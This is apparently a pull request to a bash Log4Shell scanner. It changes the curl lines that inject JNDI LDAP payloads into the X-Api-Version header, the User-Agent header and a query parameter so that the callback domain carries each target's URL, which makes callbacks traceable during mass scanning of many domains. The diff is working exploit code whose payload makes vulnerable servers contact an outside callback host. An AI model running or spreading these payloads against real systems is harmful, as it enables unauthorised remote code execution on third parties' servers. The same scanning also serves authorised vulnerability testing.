### PR TITLE
made targets identifyable in the callbacks when doing mass scanning

### DIFF
--- a/log4j-rce-scanner.sh
+++ b/log4j-rce-scanner.sh
@@ -41,9 +41,9 @@ domainScan() {
 
 listScan() {
     cat $list | sort -u | httpx -silent | while read url; do 
-    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
-    echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
-    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url.$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
+    echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$url.$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
     echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
 }
 


### PR DESCRIPTION
I found that while running this awesome tool against a massive amount of target domains it is impossible to distinguish between the source of the callbacks in any handy way so I have prepended the target urls tot he DNS queries. Thank you for this tool :) great one!